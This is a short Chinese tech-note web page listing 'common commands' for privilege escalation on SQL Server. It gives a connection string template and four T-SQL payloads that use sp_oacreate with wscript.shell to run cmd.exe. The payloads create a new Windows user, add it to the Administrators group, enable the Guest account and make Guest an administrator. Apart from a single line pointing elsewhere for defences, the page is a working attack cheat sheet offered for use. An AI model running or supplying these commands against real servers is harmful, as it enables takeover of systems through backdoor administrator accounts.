SQL Server SQL 提权 常用命令
2022-11-12 09:52:11
内容摘要
这篇文章主要为大家详细介绍了SQL Server SQL 提权 常用命令,具有一定的参考价值,可以用来参考一下。
对此感兴趣的朋友,看看idc笔记做的技术笔记!1、连接数据库driver={SQL Se
文章正文
这篇文章主要为大家详细介绍了SQL Server SQL 提权 常用命令,具有一定的参考价值,可以用来参考一下。
对此感兴趣的朋友,看看idc笔记做的技术笔记!
1、连接数据库driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名2、添加新用户declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'3、把用户加到管理组declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'4、激活GUEST用户declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'5、把Guest加到管理组declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'关于防范方法,可以参考512笔记服务器安全设置栏目。注:关于SQL Server SQL 提权 常用命令的内容就先介绍到这里,更多相关文章的可以留意
代码注释